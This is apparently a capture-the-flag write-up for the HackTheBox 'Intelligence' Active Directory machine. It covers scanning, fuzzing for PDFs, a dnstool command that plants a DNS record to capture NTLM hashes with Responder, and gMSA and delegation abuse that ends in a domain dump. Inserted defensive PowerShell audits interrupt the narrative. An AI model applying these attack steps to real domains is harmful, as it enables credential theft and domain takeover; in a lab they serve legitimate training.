# HackTheBox-Intelligence

## NMAP

```bash
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain?       syn-ack ttl 127
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-07-05 20:55:03Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
| -----BEGIN CERTIFICATE-----
| MIIF+zCCBOOgAwIBAgITcQAAAALMnIRQzlB+HAAAAAAAAjANBgkqhkiG9w0BAQsF
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:, DNS:dc.intelligence.htb
|_ssl-date: 2021-07-05T20:58:07+00:00; +7h03m50s from scanner time.
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-05T20:58:06+00:00; +7h03m50s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49701/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
58957/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/5%Time=60E30E56%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h03m49s, deviation: 0s, median: 7h03m49s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 2874/tcp): CLEAN (Timeout)
|   Check 2 (port 4953/tcp): CLEAN (Timeout)
|   Check 3 (port 29037/udp): CLEAN (Timeout)
|   Check 4 (port 21343/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-05T20:57:26
|_  start_date: N/A
```

From the scan we can see ports like 88 and 389, which are for Kerberos and LDAP, meaning that this Windows machine is an Active Directory domain controller. We can also see the domain name, which is `intelligence.htb0`. Note as well the `clock-skew` of about 7 hours reported by the host scripts; it will matter later when we use Kerberos.

## PORT 80

On port 80 there's a simple web page. Scrolling down a little we can see two documents on the web server; hovering over them shows the path of the PDF file, but we can't access the directory listing of `documents`.

Scrolling further we can see an email address with the domain `intelligence.htb`. We can fuzz for subdomains as well, so let's add it to our `/etc/hosts` file.

On viewing the announcement document, it didn't have anything useful. Neither did the other document.

So I ran gobuster, but only found the `documents` directory, which is forbidden.

One thing I noted: I tried changing the year and month and got a different PDF. This means we can fuzz for PDF documents by changing the month and day, so we need a wordlist of numbers. I generated a two-digit wordlist using `crunch`. Here I specified the min and max length to be 2, as we need the digits
01, 02 and so on. I also specified that it should stop generating numbers once it reaches 31; the `-e` option does that.

Now in `wfuzz` we can specify two wordlists and use them on different FUZZ parameters. The file names use the format year-month-day, so we can write the URL like `2020-FUZZ-FUZ2Z`; `FUZ2Z` tells wfuzz to use the second wordlist you specify. I sorted out the day and month wordlists: `dates.txt` begins at 01 and ends at 31, and `months.txt` begins at 01 and ends at 12.

```bash
wfuzz -c -w months.txt -w dates.txt --hl 29 -u http://intelligence.htb/documents/2020-FUZZ-FUZ2Z-upload.pdf
```

Here `--hl 29` hides responses with that number of lines, since the responses with a 404 status code all had 29 lines.

I tried going through all the PDFs I could find on the web server, but they all contained gibberish and weren't interesting. When I ran `exiftool` on a PDF document, though, it showed who created it. Running exiftool on every document gave the following user names.

I copied those usernames into a text file, sorted out the duplicates and put the unique names in a new file. So we have a total of 26 users, and we can check which ones are valid.

But there's a problem: we cannot proceed further until we know a valid credential. So I went back to looking at those PDF files one by one, which was really time consuming (it would have been better if I had made a Python script), but I found a password in one of the PDF files.

Now we need to see whose password this is. We have a total of 26 users to try with this password. I will be using `crackmapexec`; you can also use `kerbrute.py`, a Python script for kerbrute, so I'll show it using both tools.

Using `kerbrute.py`, though, I was getting an error about the clock skew being too great. I found an article talking about clock skew: https://techdirectarchive.com/2020/03/21/kerberos-error-clock-skew-too-great-while-getting-initial-credentials/
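The exiftool step above is exactly the check a document owner should run before publishing: every `Creator` or `Author` field in a public PDF is a username handed to whoever downloads it. The following PowerShell script is an added example, not part of the original writeup; it parses exiftool's JSON output, deduplicates the names and reports which files expose each one. The embedded JSON is a constructed sample with placeholder names; to audit a real folder, feed it the output of `exiftool -json -r <folder>`.

```powershell
# Added example: audit Creator/Author metadata across a folder of PDFs.
# Same data the writeup pulled with exiftool, used here as a pre-publication check.

function Get-DocumentCreators {
    param(
        # JSON text as produced by: exiftool -json -r <folder>
        [Parameter(Mandatory)] [string] $ExifJson
    )
    $records = $ExifJson | ConvertFrom-Json
    $leaks = @{}
    foreach ($r in $records) {
        # Depending on the generator, exiftool may fill either field
        foreach ($field in 'Creator', 'Author') {
            $name = $r.$field
            if ([string]::IsNullOrWhiteSpace($name)) { continue }
            $name = $name.Trim()
            if (-not $leaks.ContainsKey($name)) { $leaks[$name] = @() }
            $leaks[$name] += $r.SourceFile
        }
    }
    # One row per unique name, with the files that expose it
    $leaks.GetEnumerator() | Sort-Object Key | ForEach-Object {
        [pscustomobject]@{ Name = $_.Key; Files = @($_.Value | Sort-Object -Unique) }
    }
}

# Constructed sample standing in for real exiftool output (names are placeholders).
$sample = @'
[
  {"SourceFile":"documents/2020-01-01-upload.pdf","Creator":"Jane.Example"},
  {"SourceFile":"documents/2020-01-02-upload.pdf","Creator":"Jane.Example"},
  {"SourceFile":"documents/2020-06-04-upload.pdf","Author":"Sam.Example"},
  {"SourceFile":"documents/2020-12-30-upload.pdf","Creator":""}
]
'@

$report = Get-DocumentCreators -ExifJson $sample
$report | Format-Table -AutoSize
"{0} unique name(s) exposed in document metadata" -f @($report).Count

# Real run over a web root's documents folder (requires exiftool on PATH):
# Get-DocumentCreators -ExifJson (exiftool -json -r .\documents | Out-String)
```

With the sample above the report lists two names, one of them backed by two files, and the empty `Creator` field is ignored.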
So the solution would be to set the correct time on the DC or to synchronize with the DC's time. First, though, let's just try to log in using `evil-winrm`, since port 5985, on which WinRM runs, is open.

And it failed :(

So what we can do is run `smbmap` to see if we can list shares.

There's a `Users` share and we can read it, so we can probably get `user.txt` from here.

We can also get a PowerShell script from the `IT` share:

```powershell
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves ' -To 'Ted Graves ' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
```

What this PowerShell script does is an LDAP query for the domain's DNS records; it grabs the records whose name starts with `web` and then makes a web request to each of them with the credentials of the `Ted.Graves` user. Windows stores those credentials in encrypted form, so we won't get them in clear text.

So I searched on Google for the LDAP query used in this script, which seems to be about DNS delegation. I dug further and found that it's actually about unconstrained delegation, so I tried finding scripts that would add a DNS record pointing to our IP, so that we can somehow listen for the request with responder and get the creds.

> If a computer, with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive a TGS containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user
>
> In order to abuse the unconstrained delegations privileges of a computer account, an attacker must add his machine to the SPNs of the compromised account and add a DNS entry for it. This allows targets (like Domain Controllers and Exchange servers) to authenticate back to the attacker machine. This can be done with addspn, dnstool and krbrelayx (Python).

https://cheatsheet.haax.fr/windows-systems/privilege-escalation/delegations/

https://github.com/dirkjanm/krbrelayx

So we'll just use `dnstool` to add a DNS record that points to our IP address:

```bash
python3 dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -r web.intelligence.htb -a add -d YOUR_IP TARGET_IP
```

After adding it we'll run `responder`. Responder is an LLMNR, NBT-NS and MDNS poisoner: it answers specific NBT-NS (NetBIOS Name Service) queries and supports NTLMv1 and NTLMv2 hashes.

Boom, we got the NTLMv2 hash. Now we need to crack it; I'll use `hashcat`.

After getting the password I thought of running the Python BloodHound ingestor, with which we can enumerate the AD, and then passing the resulting JSON files to BloodHound.

Start `neo4j` and BloodHound. I have configured BloodHound so that it doesn't ask for a password; you can search for how to do that as well. Make an archive of those JSON files and then drag and drop it onto the GUI.

Now we can run the `Shortest Path to Unconstrained Delegation Systems` query.

We can see that the user `Ted.Graves` is a member of the ITSupport group; furthermore, that group has `ReadGMSAPassword` rights, through which we can get to the service account `SVC_INT`. We can read about this edge in BloodHound's help as well, and further we can read about `AllowedToDelegate`.

So the first step is to abuse reading the GMSA password; for that I searched for a Python script. After running this script we get a hash for the service account.

We can now abuse it using constrained delegation. I followed this command, but it throws that clock skew error again, so I added `dc.intelligence.htb` to my `/etc/hosts` file and ran `ntpdate dc.intelligence.htb` so that my machine is synced with the DC's time.

We got the administrator ticket; now we need to export a variable named `KRB5CCNAME`.

And boom, we hit the gold mine: dumping `ntds.dit` from the domain controller. Now we can use `evil-winrm` to log in, since WinRM is running on port 5985.

Note that you can revert to your own time with `ntpdate ntp.ubuntu.com`.
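As an added defensive counterpart (not from the writeup or the box): the IT-share script above authenticates to whatever host a `web*` DNS record names, and the BloodHound path chained a gMSA read right with delegation. The block below shows a hardened version of the monitor, which probes a fixed allowlist anonymously over HTTPS instead of sending the task account's credentials, followed by the ActiveDirectory cmdlets an administrator would use to list who can read gMSA passwords and which accounts carry delegation rights. The hostname allowlist is a placeholder; the audit part needs the RSAT ActiveDirectory module.

```powershell
# Added example (not the box's IT-share script): a hardened rewrite of the
# web-status monitor, followed by an audit of the rights the BloodHound path used.
# The host list is a placeholder; run the audit from a host with the RSAT AD module.

# 1. Monitor a fixed allowlist instead of every DNS record named "web*", so that
#    anyone able to create DNS records cannot insert their own host into the check.
$MonitoredHosts = @('web01.intelligence.htb')   # placeholder, maintained by hand

function Test-MonitoredHosts {
    param([string[]] $Hosts)
    foreach ($hostName in $Hosts) {
        try {
            # Anonymous HTTPS probe: no -UseDefaultCredentials, so a rogue record
            # pointing at a listener never receives the task account's NTLM auth,
            # and certificate validation rejects a host that is not the real server.
            $response = Invoke-WebRequest -Uri "https://$hostName/" -UseBasicParsing -TimeoutSec 10
            if ($response.StatusCode -ne 200) {
                Write-Warning "Host $hostName returned status $($response.StatusCode)"
            }
        } catch {
            Write-Warning "Host $hostName is down: $($_.Exception.Message)"
        }
    }
}
Test-MonitoredHosts -Hosts $MonitoredHosts

# 2. Audit the settings that turned one captured password into domain admin.
Import-Module ActiveDirectory

# Who may read each gMSA password (the writeup's ITSupport -> SVC_INT edge)
Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
    Select-Object Name, PrincipalsAllowedToRetrieveManagedPassword

# Accounts configured for constrained delegation and the SPNs they may delegate to
Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' -Properties msDS-AllowedToDelegateTo |
    Select-Object Name, ObjectClass, msDS-AllowedToDelegateTo

# Accounts trusted for unconstrained delegation (TRUSTED_FOR_DELEGATION bit, 0x80000)
Get-ADObject -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)' |
    Select-Object Name, ObjectClass

# Review each result: remove delegation rights and gMSA readers that no workload needs.
```

If the monitor genuinely needs to authenticate, give it a dedicated low-privilege account via `-Credential` rather than running it under a user whose password also unlocks directory rights.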